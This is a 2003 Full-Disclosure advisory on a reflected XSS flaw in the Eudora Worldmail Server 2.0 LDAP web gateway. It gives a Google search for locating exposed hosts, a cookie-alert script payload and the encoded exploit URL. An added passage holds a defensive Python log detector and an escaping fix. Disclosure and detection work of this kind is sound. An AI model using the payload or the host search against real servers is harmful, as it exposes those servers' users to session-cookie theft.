[Full-Disclosure] Eudora Worldmail Server 2.0 -XSS Injection

From: morning_wood (se_cur_ityat_private)
Date: Fri Aug 15 2003 - 15:34:58 PDT

    ------------------------------------------------------------------
              - EXPL-A-2003-020 exploitlabs.com Advisory 020
    ------------------------------------------------------------------
                      -= Eudora Worldmail Server 2.0 =-
    
    
    
    
    
    Donnie Werner
    Aug 9, 2003
    
    
    Product:
    --------
    Eudora Worldmail Server 2.0
    
    http://www.qualcomm.com/
    http://www.eudora.com/worldmail/
    
    
    
    Vulnerability(s):
    -----------------
    1. XSS injection
    
    
    Description of product:
    -----------------------
    http://www.eudora.com/worldmail/features.html
    
    
    Banner id:
    
    HTTP/1.0 200 Document follows
    Server: ISOCOR web500gw 2.0.0.3
    MIME-Version: 1.0
    Date: Wednesday, 06-Aug-2003  GMT
    Content-type: text/html
    
    
    Examples can be found with the following search:
    
    http://www.google.com/search?num=20&hl=en&lr=&ie=ISO-8859-1&newwindow=1&safe=off&q=Qpam.htm&btnG=Google+Search
    
    
    
    
    VULNERABILITY / EXPLOIT
    =======================
    
    Vulnerable hosts display the following:
    
    -------------- snip ----------------------
    
    A convenient hypertext interface to LDAP and X.500 Directories.
    
    
    Local domains and aliases
    Results for: entries at the top level
    
     Name Description
    Countries
     AE   <---------------- example country
     IT
     CA
    --------------- snip --------------------
    
    Select a country ("AE" is used as the example); you should see a URL like the following:
    
    http://[host]:8888/c%3dAE
    
    and a search box
    
    "One-level search in AE:"
    
    <FORM METHOD=GET ACTION="/c%3dAE">
    <A NAME="search_form">One-level search in</A> <STRONG>AE</STRONG>:<br>
    <INPUT NAME="?O" SIZE=39><INPUT TYPE=submit VALUE="Search">
    <INPUT TYPE=reset VALUE="Clear"></FORM>
    
    Enter some XSS into the search box, such as:
    
    <SCRIPT>alert(document.cookie);</SCRIPT>
    
    
    and you get the following URL:
    
    http://[host]:8888/c%3dAE?%3FO=%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C%2FSCRIPT%3E
    
    The injected script is rendered as part of the formatted HTML output.
    
    Yes, it is just a non-persistent XSS, but this is running as a service on
    port 8888 on a mail processing server, so there may be other issues
    (DoS?) as well.
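    Added example (not from the advisory or the vendor): a defender-side Python
    check that flags requests whose "?O" search value decodes to HTML markup in
    gateway access logs, plus the escaping the gateway would need before
    reflecting the term. The log lines are constructed, and the heading used as
    the reflection point is an assumption, since the advisory does not say where
    web500gw echoes the value.

```python
# Added example (not from the advisory): flag reflected-XSS probes against the
# web500gw "?O" search field in access logs, and escape the term before reflecting it.
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed common-log-format lines for the port 8888 gateway (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [06/Aug/2003:10:01:02 +0000] "GET /c%3dAE HTTP/1.0" 200 1421
10.0.0.5 - - [06/Aug/2003:10:01:09 +0000] "GET /c%3dAE?%3FO=smith HTTP/1.0" 200 980
10.0.0.9 - - [06/Aug/2003:10:02:15 +0000] "GET /c%3dAE?%3FO=%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C%2FSCRIPT%3E HTTP/1.0" 200 1102
10.0.0.9 - - [06/Aug/2003:10:02:40 +0000] "GET /c%3dAE?%3FO=%253Cscript%253E HTTP/1.0" 200 1001
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]", re.IGNORECASE)  # tag-like token after decoding

def search_terms(target: str) -> list[str]:
    """Decoded values of the form field literally named "?O" (sent as %3FO).
    Values get a bounded number of extra decodes so double-encoded payloads
    such as %253C are not missed."""
    terms = []
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if key != "?O":
            continue
        for _ in range(3):  # stop once another decode changes nothing
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        terms.append(value)
    return terms

def flag_xss_probes(log_text: str) -> list[dict]:
    """One finding per request whose decoded search term contains markup."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        for term in search_terms(m["target"]):
            if MARKUP_RE.search(term):
                findings.append({"ip": m["ip"], "status": m["status"], "term": term})
    return findings

def render_search_heading(country: str, term: str) -> str:
    """The fix: HTML-escape the reflected term. Where web500gw actually echoes it
    is not known from the advisory; this heading is an assumed stand-in."""
    return f"<STRONG>{html.escape(country)}</STRONG>: {html.escape(term)}"
```

    Running flag_xss_probes(SAMPLE_LOG) reports the two requests from 10.0.0.9, including the double-encoded one that a single-decode filter would miss.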
    
    I believe LDAP has some DCOM connectivity, and there could be issues
    with the LDAP...
    
    SLAPD or X.500 Error: Not found
    An error occurred while searching the SLAPD or X.500 directory
    The error code was 32:
    
    No such object.
    No additional information is available.Please report errors to the
    Administrator.
    
    
    Local:
    ------
    ???
    
    Remote:
    -------
    yes
    
    Vendor Fix:
    -----------
    No fix on 0day
    
    
    Vendor Contact:
    ---------------
    Concurrent with this advisory
    eudora-custservat_private
    
    Credits:
    --------
    
    Donnie Werner
    morning_wood@e2-labs.com
    http://e2-labs.com
    
    Original at
    http://exploitlabs.com/files/advisories/EXPL-A-2003-020-eudora-worlmail-server.txt
    
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    